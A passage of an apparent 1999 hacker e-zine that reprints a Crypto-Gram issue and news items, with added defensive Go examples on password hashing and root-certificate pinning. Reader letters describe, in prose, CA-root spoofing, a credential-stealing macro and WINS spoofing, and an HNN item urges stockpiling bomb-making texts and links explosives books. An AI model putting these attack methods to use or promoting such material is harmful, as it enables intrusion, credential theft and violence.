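Added example, in Go, to make the Doghouse point concrete; it is not Novell's code and not part of Crypto-Gram. The first half is a stand-in for substitution-plus-XOR obfuscation of the kind described above (the substitution table and XOR key are constructed for illustration, not taken from NetWare); the second half is a salted, iterated PBKDF2-HMAC-SHA256 hash with constant-time verification. The iteration count and the pbkdf2-sha256$iter$salt$hash record format are this example's own choices.

```go
// Added example, not Novell's code and not from Crypto-Gram: reversible
// obfuscation versus a real password hash. The substitution table, XOR
// key, iteration count and record format are constructed for this
// illustration.
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// --- The NetWare-style approach: value substitution plus XOR. Both steps
// are bijections, so the "protected" file is the password in a different
// alphabet, and whoever reads the code can map it straight back.

var subst, unsubst [256]byte

func init() {
	for i := range subst {
		subst[i] = byte(i*167 + 33) // constructed permutation (odd multiplier mod 256)
		unsubst[subst[i]] = byte(i)
	}
}

const xorKey = 0x5A // constructed "secret" baked into the program

// Obfuscate is what the weak scheme would store.
func Obfuscate(pw string) []byte {
	out := make([]byte, len(pw))
	for i := 0; i < len(pw); i++ {
		out[i] = subst[pw[i]] ^ xorKey
	}
	return out
}

// Deobfuscate undoes it exactly: no brute force, no secret beyond the code.
func Deobfuscate(blob []byte) string {
	out := make([]byte, len(blob))
	for i, b := range blob {
		out[i] = unsubst[b^xorKey]
	}
	return string(out)
}

// --- The sound approach: a salted, iterated one-way function.
// PBKDF2-HMAC-SHA256 as in RFC 8018, written out because Go's standard
// library before 1.24 ships no PBKDF2 package.

func pbkdf2SHA256(password, salt []byte, iter, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var dk []byte
	for block := 1; len(dk) < keyLen; block++ {
		prf.Reset() // U_1 = PRF(P, S || INT(block))
		prf.Write(salt)
		prf.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for j := 1; j < iter; j++ { // U_j = PRF(P, U_{j-1}); T = U_1 xor ... xor U_iter
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for k := range t {
				t[k] ^= u[k]
			}
		}
		dk = append(dk, t...)
	}
	return dk[:keyLen]
}

const iterations, saltLen, keyLen = 100000, 16, 32 // raise iterations as hardware gets faster

// HashPassword returns "pbkdf2-sha256$<iter>$<salt hex>$<hash hex>". The
// random salt makes every record unique and defeats precomputed tables.
func HashPassword(pw string) (string, error) {
	salt := make([]byte, saltLen)
	if _, err := rand.Read(salt); err != nil {
		return "", err
	}
	dk := pbkdf2SHA256([]byte(pw), salt, iterations, keyLen)
	return fmt.Sprintf("pbkdf2-sha256$%d$%s$%s", iterations,
		hex.EncodeToString(salt), hex.EncodeToString(dk)), nil
}

// VerifyPassword recomputes with the stored salt and iteration count and
// compares in constant time; the stored record never yields the password.
func VerifyPassword(pw, stored string) (bool, error) {
	parts := strings.Split(stored, "$")
	if len(parts) != 4 || parts[0] != "pbkdf2-sha256" {
		return false, errors.New("unrecognised password record")
	}
	iter, err := strconv.Atoi(parts[1])
	if err != nil || iter < 1 {
		return false, errors.New("bad iteration count")
	}
	salt, err := hex.DecodeString(parts[2])
	if err != nil {
		return false, err
	}
	want, err := hex.DecodeString(parts[3])
	if err != nil {
		return false, err
	}
	got := pbkdf2SHA256([]byte(pw), salt, iter, len(want))
	return subtle.ConstantTimeCompare(got, want) == 1, nil
}

func main() {
	blob := Obfuscate("hunter2")
	fmt.Printf("obfuscated %x recovers to %q\n", blob, Deobfuscate(blob))
	rec, _ := HashPassword("hunter2")
	ok, _ := VerifyPassword("hunter2", rec)
	fmt.Println(rec, ok)
}
```

Run it and the obfuscated bytes map straight back to the password, while the hashed record can only be checked by recomputing with its stored salt. The hashing cost is deliberately high; choose the iteration count against the login rate the server has to sustain, and store the count in the record, as above, so it can be raised later without invalidating old entries.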
News story:
http://www.infoworld.com/cgi-bin/displayNew.pl?/security/990426sw.htm
Details are at:
http://oliver.efri.hr/~crv/security/bugs/Others/nware12.html

** *** ***** ******* *********** *************

U.S. Crypto Legislation Update

Once again, the U.S. Congress is trying to enact legislation to relax export controls on computer hardware and software that include encryption. The hope is that actual laws will eventually replace the ITAR regulations, which are not laws and have never been voted on.

On March 24, the House Judiciary Committee approved H.R. 850, the "Security And Freedom through Encryption" (SAFE) Act. We like this bill; it generally relaxes export controls on encryption software. On the minus side, it also includes a controversial provision that creates a new criminal offense for using encryption during a crime. But on the plus side, the Committee rejected an attempt by Rep. Bill McCollum (R-FL) to introduce an amendment that would have limited relaxation to those encryption products that have key-escrow (or whatever they are calling it these days).

The bill is sponsored by Congressman Robert Goodlatte (R-VA) and Congresswoman Zoe Lofgren (D-CA) (both great people who deserve our support) and currently has 251 co-sponsors, including the Republican and Democrat leaders. Republican leaders sent a "Dear Colleague" letter to all members of Congress last week urging passage of the bill. Unfortunately, it has now been referred to the Commerce, International Relations, Armed Services, and Intelligence Committees for further review. If you remember back to 1997, the House Armed Services and Intelligence Committees both revised a similar bill -- at the request of the FBI -- to impose restrictions on crypto products; their efforts to pass that gutted bill were defeated with help from industry and public interest groups. Majority Leader Dick Armey has told Rep.
Goodlatte that he expects the legislation to be voted on by the House by summer; we'll have to wait and see.

There is also some progress in the Senate this year. In a surprising turnaround, Senator John McCain (R-AZ) has reversed his previous support for domestic encryption restrictions and introduced a bill to slightly relax export controls. His new bill, S. 798, "Promote Reliable On-Line Transactions to Encourage Commerce and Trade" (PROTECT) Act of 1999 relaxes export controls on products with 64-bit keys or less. Restrictions are also relaxed on publicly traded companies, regulated or regularly audited companies (such as banks or insurance companies), subsidiaries of U.S. companies and strategic partners, online merchants, and governments in NATO, OECD and ASEAN (a weird choice). Products that have longer keys than 64 bits can be exported if a new Encryption Export Advisory Board and the Secretary of Commerce approve the exports after finding that "the product or service is...generally available, publicly available; or an encryption product utilizing the same or greater key length or otherwise providing comparable security is, or will be within the next 12 months generally or widely available outside the United States from a foreign supplier." Decisions will be subject to judicial review.

The bill requires the National Institute of Standards and Technology to finish the Advanced Encryption Standard (AES) selection by January 1, 2002. After the AES is selected, products that incorporate the AES or have an equivalent strength may be exportable without a license in most cases. The bill also prohibits mandatory access to encryption keys or key recovery information by the United States government or the government of any state. However, it also contains provisions that require NIST to assist law enforcement in enhancing access to cryptography and intrusion detection systems.
The bill has been referred to the Senate Commerce Committee, where Senator McCain is Chairman. It is also co-sponsored by Senators Leahy (D-VT), Burns (R-MT), Kerry (D-MA), Abraham (R-MI), and Wyden (D-OR).

It promises to be an interesting year in Congress.

SAFE Act:
http://thomas.loc.gov/cgi-bin/query/z?c106:H.R.850.IH:
PROTECT ACT:
http://thomas.loc.gov/cgi-bin/query/z?c106:S.798.IS:

(This article was co-written with David Banisar.)

** *** ***** ******* *********** *************

Counterpane Systems News

Rootfest '99. Bruce Schneier will be speaking at RootFest, a hackers' convention on 21-23 May 1999, in Minneapolis.
http://www.rootfest.org/

NetSec '99. At 8:00 AM on 15 June, Bruce Schneier will give the keynote speech at NetSec '99 in St. Louis. Schneier will also be speaking about securing legacy applications at 2:00 that afternoon.
http://www.gocsi.com/conf.htm

** *** ***** ******* *********** *************

Factoring with TWINKLE

At Eurocrypt '99, Adi Shamir presented a new machine that could increase our factoring speed by about 100-1000 times. Called TWINKLE (The Weizmann INstitute Key Locating Engine), this device brings 512-bit keys within the realm of our ability to factor.

The best factoring algorithms known to date all work on similar principles. First, there is a massive parallel search for equations with a certain relation. This is known as the sieving step. Then, after a certain number of relations are found, there is a massive matrix operation to solve a linear equation and produce the prime factors. The first step can easily be paralleled -- recently, 200 computers worked in parallel for about four weeks to find relations to help factor RSA-140 -- but the second has to be done on a single supercomputer: it took a large Cray about 100 hours and 810 Mbytes of memory to factor RSA-140.

Shamir conceptualized a special hardware device that uses electro-optical techniques to sieve at speeds much faster than normal computers.
He encodes various LEDs with values corresponding to prime numbers, and then uses it to factor numbers. The machine reminds me of the famous Difference Engine of the 1800s. Once the engineering kinks are worked out -- and there are considerable ones -- this machine will be as powerful as 100-1000 PCs for about $5000. The basic idea is not new; a mechanical-optical machine built by D.H. Lehmer in the 1930s did much the same thing (although quite a bit more slowly).

As far as we know, Shamir's machine has never been built. (I can't speak for secret organizations.) As I said, Shamir presented a conceptualization and a sketch of a design, not a full set of engineering blueprints. There are all sorts of details still to be figured out, but none of them seem impossible. If I were running a multi-billion-dollar intelligence organization, I would turn my boffins loose at the problem.

The important thing to note is that this new machine does not affect the matrix step at all. And this step explodes in complexity for large factoring problems; its complexity grows much faster than the complexity of the sieving step. And it's not just the time, it's the memory requirements. With a 1024-bit number, for example, the matrix step requires something like ten terabytes of memory: not off-line storage, but real computer memory. No one has a clue how to solve that kind of problem.

This technique works just as well for discrete-logarithm public-key algorithms (Diffie-Hellman, ElGamal, DSA, etc.) as it does for RSA, although it is worth noting that the matrix problem is harder for discrete-log problems than it is for factoring. The technique does not apply to elliptic-curve-based algorithms, as we don't know how to use the sieving-based algorithms to solve elliptic-curve problems.

In "Applied Cryptography," I talked about advances in factoring coming from four different directions. One, faster computers. Two, better networking.
Three, optimizations and tweaks of existing factoring algorithms. And four, fundamental advances in the science of factoring. TWINKLE falls in categories one and three; there is no new mathematics in this machine, it's just a much faster way of doing existing mathematics.

Shamir's contribution is obvious once you understand it (the hallmark of a brilliant contribution, in my opinion), and definitely changes the landscape of what public-key key sizes are considered secure. The moral is that it is prudent to be conservative -- all well-designed security products went beyond 512-bit moduli years ago -- and that advances in cryptography can come from the strangest places.

Shamir's paper:
http://jya.com/twinkle.eps
The RSA Data Security opinion:
http://www.rsa.com/rsalabs/html/twinkle.html

** *** ***** ******* *********** *************

Comments from Readers
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Subject: Attacking Certificates with Computer Viruses

>So if you're a paranoid computer-security professional,
>the obvious question to ask is: can a rogue piece of
>software replace the root-level certificates in my browser
>and trick me into trusting someone?

Of course it can. You don't even need rogue software, all you need is Internet Explorer. Try this: Using your favorite certificate toolkit, create a CA root certificate which is identical to an existing one (except for the key) and stick it in a web page. Click on the link with MSIE. You'll be presented with a dialog telling you you're about to accept a new certificate from, for example, "Verisign Class 1 Public Primary Certification Authority". Once you've clicked OK (as virtually all users will), you've replaced the standard CA root with your own one, and can use it to certify rogue servers, CA's, email, viruses, and whatever else you feel like. There's no warning presented by MSIE, it just quietly replaces the existing cert.

(Hint: You may want to test this with one of the lesser-used CA's rather than Verisign, because even ignoring the security implications it's a significant denial-of-service attack. This hole may have been fixed in newer versions of MSIE, but it worked fine in 3.02, which is the last version which doesn't try to take over your machine when you install it).
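A defender's counterpart to the letter above, added here as an example and not taken from Gutmann, Crypto-Gram or any browser vendor: pin the SHA-256 fingerprint of every root you ship and raise an alert when a root with the same subject name reappears under a different fingerprint, which is exactly the "identical except for the key" case he describes. It is written in Go because the standard library can mint the test certificates in-process, so it runs offline; the CA name "Example Class 1 Primary CA" and the organisation "Example Corp" are constructed.

```go
// Added example, not from Peter Gutmann's letter or any browser vendor:
// detect a trusted root that was replaced by a look-alike carrying the
// same subject name but a different key, by pinning each root's SHA-256
// fingerprint and diffing the live store against that baseline. The
// roots are generated in-process with crypto/x509 so this runs offline;
// the CA names are constructed.
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

// Fingerprint is the SHA-256 of the certificate's DER encoding, the value
// CAs publish out of band and the one worth pinning.
func Fingerprint(der []byte) string {
	sum := sha256.Sum256(der)
	return hex.EncodeToString(sum[:])
}

// Baseline maps subject DN -> fingerprint for every parseable certificate
// in a store; entries that do not parse are skipped.
func Baseline(store [][]byte) map[string]string {
	base := make(map[string]string, len(store))
	for _, der := range store {
		cert, err := x509.ParseCertificate(der)
		if err != nil {
			continue
		}
		base[cert.Subject.String()] = Fingerprint(der)
	}
	return base
}

// Change records one difference between the pinned baseline and the
// live store. Kind is "replaced", "added" or "removed".
type Change struct {
	Subject, Kind, Old, New string
}

// Audit diffs the live store against the pinned baseline. A subject that
// is still present but whose fingerprint changed is the case in the
// letter above: familiar name, someone else's key.
func Audit(baseline map[string]string, live [][]byte) []Change {
	var changes []Change
	seen := make(map[string]bool)
	for subj, fp := range Baseline(live) {
		seen[subj] = true
		old, pinned := baseline[subj]
		if !pinned {
			changes = append(changes, Change{subj, "added", "", fp})
		} else if old != fp {
			changes = append(changes, Change{subj, "replaced", old, fp})
		}
	}
	for subj, old := range baseline {
		if !seen[subj] {
			changes = append(changes, Change{subj, "removed", old, ""})
		}
	}
	return changes
}

// NewTestRoot builds a self-signed CA certificate with the given name and
// a fresh P-256 key, so two calls with the same name give two different
// certificates (the look-alike scenario). Constructed test data only.
func NewTestRoot(cn string) []byte {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: cn, Organization: []string{"Example Corp"}},
		NotBefore:             time.Now(),
		NotAfter:              time.Now().AddDate(10, 0, 0),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	return der
}

func main() {
	genuine := NewTestRoot("Example Class 1 Primary CA")
	pinned := Baseline([][]byte{genuine})
	lookalike := NewTestRoot("Example Class 1 Primary CA") // same name, new key
	for _, c := range Audit(pinned, [][]byte{lookalike}) {
		fmt.Printf("%-8s %s\n  old %s\n  new %s\n", c.Kind, c.Subject, c.Old, c.New)
	}
}
```

Against a real trust store you would feed Baseline the DER of the roots at build or install time and run Audit over the live store on a schedule. The "replaced" kind is the signal that matters; "added" and "removed" also occur on legitimate root-program updates, so treat those as review items rather than alarms.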
From: Ed Gerck
Subject: Re: Smart Card Threats

I enjoyed reading your paper on smart-card security issues (Cryptogram Apr/15/1999). I find it specially useful since it provides yet more examples where trust cannot be seen as an objective property of a system, not even for some of its parts. I believe the same applies to all systems, though -- however unperceived in most cases. Smart-cards are thus IMO no better and no worse in principle than a computer on the Net.

Trust is essentially subjective and thus any recognizable part of any system can operate within its own and different trust truth-conditions -- potentially leading to different trust-values when in interaction with other parts, perhaps from other systems and also differently for each other part, history, and time. At the end, the main question is thus not whether it is a smart-card or a computer on your desk -- but whether you can rely upon it for your decisions (i.e., trust it within a specific extent and epoch, for specific trust-points). Which may be easier to accept for a smart-card that you always carry with you in contrast to a computer that you never see, such as a server -- but not necessarily, as your paper exemplifies.

I would like to comment also on another part of your newsletter, where you have the title "Trusting the Known" -- since, of course, no one can trust the unknown. IMO, the gist of your text is "Trusting with Qualification" which introduces the discussion on the *degree* of such qualification as you then proceed to do. I also note that it is possible to trust without qualification on the trusted matter itself, even though you must know it -- and that such may even apply to what you analyzed, as when a spy in a spy-ring trusts the key handed down by the spymaster, in an objective way as an "authorization" and entirely based on his trust on the spymaster... not on the key's qualifications.
From: jmm@elegant.com (John Macdonald)
Subject: "In cryptography, there is security in following the crowd"

Careful how you phrase that. As written, it could easily be used to justify choosing Microsoft PPP rather than IPSec because that is where "the crowd" has led. Nobody who reads and understands the article would consider the masses generally unknowledgeable about cryptography to be the right "crowd" to follow of course, but I shudder to think of this article being read by a marketing droid looking for the catch-phrases for his next ad campaign, or a purchasing agent being challenged about an all-Microsoft buying policy.

From: hecker@netscape.com (Frank Hecker)
Subject: Re: CRYPTO-GRAM, April 15, 1999

>Other Internet protocols -- S/MIME, SSL, etc. -- take a more
>hierarchical approach. You probably got your public key
>signed by a company like Verisign. A Web site's SSL public
>key might have been signed by Netscape.

>This attack isn't without problems. If a virus replaces the
>root Netscape certificate with a phony one....

For the record, Netscape does not sign web sites' public keys (i.e., act as a Certificate Authority for them); I don't believe Netscape has ever performed this service. Thus there is no "root Netscape certificate" included in the Netscape Navigator and Netscape Communicator products, if by that you mean a certificate for a hypothesized Netscape CA. Netscape Navigator and Netscape Communicator as shipped do include root CA certificates for a number of public CA services, and we recommend that our customers use those services (unless they wish to act as their own CA).

This doesn't of course change the underlying argument of your article, concerning the vulnerability to replacement of the included root certificate list; I just wanted to correct a minor error of fact.
From: "hans@netman.se"
Subject: Smart-Card Flaws

For the last 2.5 years I've been responsible for the security issues when implementing a large Smart Card based authorization concept for Windows NT 4.0 here in Sweden and here are 3 major flaws I've encountered when dealing with smart cards:

1) When connecting to a NT server your user name, password and X509v3 certificate are sent to the server. The server starts a challenge response using the public key in the certificate and encrypts a random value. The encrypted random value and the server certificate are then sent to the smart card and decrypted with the corresponding private key. Then the smart card encrypts the random value with the server's public key in the server certificate and sends it back to the server, which compares the two values. Since there is no connection between the value in the X509 certificate (subject field and Common Name) and the user ID you may enter some other person's ID and password which are sent with your certificate. So the strong authentication will begin using your Public and private RSA keys but you will get the other person's privileges and access rights!

2) On an RSA based smart card you usually store the user id and password on the data area (SSO table = Single Sign On Table) -- the problem lies in the fact that the smart cards offered today are limited in storage data, such as certificates and user IDs and passwords, to 8K maximum. (You may find cards on the market that can store more than 8K data but you can't buy them yet.) So if we use certificates with RSA based keys stored in them, which are 1024 bits long, you may only have 2 certificates and 2 corresponding private keys. If we use RSA based keys stored in a smart card that are 512 bits long, we can store 3 certificates in them. And since 512 bit RSA keys are in the Wassenaar agreement and you may export them, you can't trust them :-). So we used 1024 bits keys instead and used them for authentication and encryption.
So the following will then happen. You enter the PIN that opens the card AND opens for usage of the certificate and private key for authentication/encryption since we want to do a strong authentication of the user. I can then decrypt anything that the user of the smart card has encrypted since the usage of the private key is opened by the user when he enters his PIN! If I can get the user to execute a Trojan horse program the user will not even know that I'm decrypting something he encrypted with his private key! Therefore you can't encrypt the user id and the password stored on the smart card! So I can read this from the smart card and get user id and the corresponding password and email it to me! (I've done this once using just Visual Basic for Application and a macro stored in the normal.dot)

3) If we do a challenge response in a NT environment the server needs to know which work station/server he is talking to. So in your case the server program used WINS to get the IP-address from the workstation name. This opened to a nice attack: The user logged in on a NT workstation using his smart card and was authenticated by challenge response. We sent an email to the user that included a macro in the normal.dot and got the workstation's name from the workstation, and user id and password from the smart card. We then got another NT workstation and named it as the user's workstation name and tried to get a connection to a disk on the NT server. We were prompted for user ID and password, which we entered and voila! We got access to the disk! The server in this case got the workstation name, the user id and password and used WINS to find the corresponding IP address for that workstation name. Then the server did a strong authentication on the IP address that the server got from WINS. That IP address was not our machine's IP address, it was the user's IP address!
In the NT security log we could read that the user logged in to that disk and that he was authenticated by the use of strong authentication.

So the question is: Can you rely on Smart Cards? And my answer is: Yes, if you know what they can do and what they can't!

** *** ***** ******* *********** *************

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

Counterpane Systems is a six-person consulting firm specializing in cryptography and computer security. Counterpane provides expert consulting in: design and analysis, implementation and testing, threat modeling, product research and forecasting, classes and training, intellectual property, and export consulting. Contracts range from short-term design evaluations and expert opinions to multi-year development efforts. http://www.counterpane.com/

Copyright (c) 1999 by Bruce Schneier

@HWA

40.0 [ISN] Why i'm a security pessimist
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded
From: Traumatic Dog

Why I'm a Security Pessimist
URL: http://chkpt.zdnet.com/chkpt/adem2fpf/www.anchordesk.com/story/story_3377.html

Jesse Berst, Editorial Director
ZDNet AnchorDesk
Wednesday, May 12, 1999

We're still in the primitive days of the Internet. So we still expect some security problems. And we assume they'll get better. Right?

Wrong. The security problem is getting worse. Headlines tell me Internet security lapses are becoming more common. Even the White House isn't safe. And Melissa showed us viruses are growing more wily. We're all at the mercy of corner-cutting software vendors, inexperienced e-tailers and smart-ass programmers.

WHY YOU ARE MORE VULNERABLE

There's no single culprit. Much of it has to do with changing times:

  As the Internet is more widely used, the potential for good and bad increases
  By expanding networks, companies create more opportunity for security breaches
  As competition gets more intense, vendors push products out the door faster
  As product complexity increases, bugs are more likely
  As ecommerce explodes, vendors are rushing to set up shop online

WHERE YOU ARE MOST VULNERABLE

Computer users are being impacted at work, at home, online:

  The number of software bugs tracked in the BugNet database grew nearly 20-fold in the past five years. The bug explosion costs employers millions of hours in lost productivity
  The insidious Melissa virus, which infected over 100,000 computers in the U.S., was a nuisance; weeks later the destructive CIH virus crashed more than half a million computers in South Korea and Turkey
  E-businesses are unwittingly exposing private customer information, including names, addresses and credit card info; last month 100 sites with improperly installed shopping carts were identified

HOW TO LIMIT YOUR VULNERABILITY

You can't prevent bugs, viruses and inept e-tailers. But there are ways to protect yourself.

Your computer.
If events of recent months didn't persuade you to obtain anti-virus software for your PC, maybe this quick click to free, five-star anti-virus downloads will do the trick. Bookmark the Help Channel's Bug section for the latest bug alerts, patches and workarounds for your software and hardware.

Your company. PC Magazine Labs evaluated three families of antivirus products that protect every major LAN component. If your company conducts business over the Internet, two major security holes you need to plug are DNS spoofing and attacks on dial-up connections.

Your personal information. Make sure before you relinquish any personal information the Web site has the TRUSTe seal of approval and/or a privacy statement you can live with. Or become a stealth browser; the Help Channel details how to maintain a low profile on the Web.

For even more resources, visit the Security and Privacy Briefing Centers I've linked in the sidebar. And please use the TalkBack button to tell me if you agree things are getting worse, not better. You're also welcome to join the discussion at my Berst Alerts forum.

[snip..]

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

41.0 Bombs Off The Net!
     ~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Bombs Off the Net, Senate Says
contributed by g0rn

New legislation recently tacked onto the Violent and Repeat Juvenile Offender Accountability and Rehabilitation Act will make 'bomb-making information' on the net illegal. The law would also apply to any form of distribution--books, magazines, or videos. Well, we suggest that you get copies of any information you feel may be threatened now and sock it away.
C|Net
http://www.news.com/News/Item/0,4,36785,00.html?st.ne.fd.mdh.ni

textfiles.com - Get 'em while you can
http://www.textfiles.com/

Bombing victims held a press conference yesterday to plead with Internet companies to purge or block Web sites that carry recipes for building bombs. How come no one is protesting the local library or the High School chemistry book? Why does everyone always pick on the internet?

Nando Times
http://www.techserver.com/story/body/0,1634,50706-81476-578139-0,00.html
Wired
http://www.wired.com/news/news/politics/story/19785.html

Late Update

This information is fast disappearing from the web. The above site textfiles.com has already removed the relevant sections (at least temporarily). We suggest you grab what you can while you can.

The Anarchists Cookbook
http://www.amazon.com/exec/obidos/ASIN/0962303208/thehackernewsnet
Highly Explosive Pyrotechnic Compositions
http://www.amazon.com/exec/obidos/ASIN/0873648277/thehackernewsnet
Homemade C-4 : A Recipe for Survival
http://www.amazon.com/exec/obidos/ASIN/0873645588/thehackernewsnet
Improvised Explosives : How to Make Your Own
http://www.amazon.com/exec/obidos/ASIN/0873643208/thehackernewsnet

303.org has graciously mirrored the missing sections from textfiles.com. They are still working on it but some stuff is available now.

303.org
http://www.303.org/explosives/

The stories;

C|Net;

Senate blasts bomb-making info on Net
By Courtney Macavinta
Staff Writer, CNET News.com
May 19, 1999, 1:00 p.m. PT

Distributing bomb-making information on the Net would be illegal in most cases under Senate legislation being debated in the wake of the killings at Columbine High School in Littleton, Colorado, and a rash of subsequent threats at campuses around the country.

With an 85-13 vote, Sens. Dianne Feinstein (D-California) and Orrin Hatch (R-Utah) successfully tacked an amendment onto the Violent and Repeat Juvenile Offender Accountability and Rehabilitation Act yesterday.
The provision prohibits teaching or demonstrating how to make explosives with the "intent" that the information will be used to commit a federal crime. The law would apply to any form of distribution--books, magazines, or videos, for example.

However, like measures Feinstein has pushed in the past, the Net is once again the focal point. That's because the two teenagers, who witnesses say killed 13 people in Littleton, reportedly documented their weapon-making and massacre plans online.

"The youngsters in Colorado who perpetrated the crime indicated they got the formula for the pipe bombs directly from the Internet," Feinstein stated on the Senate floor.

The same bill, which is still being debated today, also would require that Net access providers offer customers filtering technologies and bans online gun or explosives sales that would violate existing laws.

But First Amendment experts are alarmed by the bomb-making provision. They say it could apply to people who aren't inciting violence.

"If a high school chemistry teacher posts online material for a course that he knows could be used to build a device, it's entirely possible that someone unknown to the teacher will use it to commit a federal crime of violence," said Barry Steinhardt, associate director of the American Civil Liberties Union. "That is problematic, because on the Net you can't know the intent of your audience."

But Hatch says to be prosecuted, publishers would have to encourage violence along with the posting of bomb-making data. The Senator pointed to the Animal Liberation Front's Web site as an example of the type of material he wants to outlaw. The site has a pamphlet, Final Nail #2, which includes diagrams about how to build devices to set off fire alarm sprinklers or to damage stores that sell fur coats.

"It is a detailed guide to terrorist activities," Hatch said on the Senate floor.

"Why someone feels the need to put such harmful material on the Internet is beyond me; there certainly is no legitimate need for our kids to know how to make a bomb," he added. "[If a] person crosses the line to advocate the use of that knowledge for violent criminal purposes, or gives it out knowing it will be used for such purposes, then the law needs to cover that conduct."

Although the Hatch-Feinstein amendment targets only those whose "intent" is to incite violence, free speech watchdogs today echoed concerns they have with a recent federal court decision in Oregon that held online speakers liable for inciting offline violence.

In that case, U.S. District Judge Robert Jones issued a permanent injunction prohibiting a group of abortion foes from distributing "wanted" posters that list abortion providers' personal information and redistributing the data on sites such as the Nuremberg Files, which called for the "baby butchers" to be "brought to justice." The case is under appeal.

"What remains to be resolved by the courts is 'how far is too far' in making information available that could be used in the commission of a crime," said David Sobel, general counsel at the Electronic Privacy Information Center.

"I have concerns about how the [bomb-making] language might be applied," he added. "Provisions like this are subject to abuse in the hands of an overzealous prosecutor."

Still other legal experts said the amendment likely would pass constitutional tests.

"There are serious constitutional questions about regulating information about making bombs," said Lance Rose, author of NetLaw. "If this law is passed and it survives any constitutional challenges, there will be a fundamental proposition that you can regulate bomb information at least sometimes."

But Rose added: "It's a slippery slope.
Once you have a law like this in place, the question is, 'How far can they go?'"

Despite the free speech debate, legal experts say lawmakers' campaigns to rid the Net of bomb-making information won't necessarily help to curb access to such information.

"There is ample information available about this offline, including information from the Agricultural Department and U.S. military training manuals," the ACLU's Steinhardt said. "The Net is a global medium--a lot of information also comes from outside of the United States. This measure is totally futile."

-=-

Wired;

-=-

Victims Want Bomb Sites Off Web
Reuters
5:50 p.m. 19.May.99.PDT

The brother of convicted Unabomber Theodore Kaczynski, a victim of one of his bombings, and the mother of a victim of the Oklahoma City bombing made a plea on Wednesday for Internet companies to purge or block Web sites that carry recipes for building bombs.

David Kaczynski, Unabomber victim Gary Wright, and Marsha Kight, whose daughter died in the Oklahoma City blast, appeared at a news conference to ask America Online, Microsoft, Walt Disney, and Yahoo to police the vast array of Web sites on a voluntary basis.

Access to violent sites, particularly by children, has come under sharp focus since the Littleton, Colorado high school shootings, where one of the teenage killers detailed the building of pipe bombs on the Web a year earlier.

David Kaczynski, who has made few public statements since he exposed his brother as the Unabomber, said that he saw a parallel between his and his wife's decision to turn his brother in to authorities and the issue that faces Internet companies.

"It was absolutely agonizing for us to make the decision to turn in my brother," said Kaczynski, a social worker in upstate New York. "I think it's much less agonizing for Internet companies, and they ought to do it."

Wright, a Salt Lake City software executive, was injured when he picked up a Unabomber bomb behind a computer store where he worked in 1987.
Kight's 23-year-old daughter was among the 168 people who died in the 1995 bombing of the Oklahoma City federal office building.

Writing letters to AOL, Microsoft, Disney - which is part owner of the Go Network - and Yahoo, the victims and a New York-based group called the Centre for Community Interest want host companies to scan for and delete bomb-making instructions and to block access to such sites through search engines.

Industry spokesmen said that companies do what they can, but they questioned whether it is possible to scan the content of every Web site, particularly if a bomb recipe, for example, contains just chemical ingredients and no violent or hateful language.

Dennis Saffran, head of CCI, which also has defended pornography-shop restrictions and panhandling bans, said that the call would not violate the constitutional right to free speech because they are seeking the voluntary cooperation of private companies. But, he added, limited government regulation might be needed if companies don't participate on a voluntary basis.

"We're giving every troubled kid out there the tools to become a Tim McVeigh or a Ted Kaczynski," he said.

@HWA

42.0 Dark Spyre may end up in jail
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Dark Spyre May end up in Jail
contributed by erewhon

A year shy of completing his probation after being indicted on two counts of felony theft in January 1995, Dark Spyre (Ryan David Schwartz) may soon end up behind bars. For several weeks in 1993-94 Dark Spyre worked on breaking the codes of a long-distance phone company based in Mississippi. Part of his sentence for these crimes was probation. Now his probation may be revoked. The Assistant District Attorney claims that he violated his probation when he used a computer. Dark Spyre claims that the closest he has gotten to a computer is when he asked a schoolmate to type a paper for him.
Allowing someone else to use a computer on Schwartz's behalf is the same as if Schwartz had used it, the DA said.

ComputerNews Daily
http://199.97.97.16/IMDS%7CCND7%7Cread%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1297-0139-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1301-0143-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/

Former Hacker in a Probation Struggle
PATTI MUCK
c.1999 Houston Chronicle

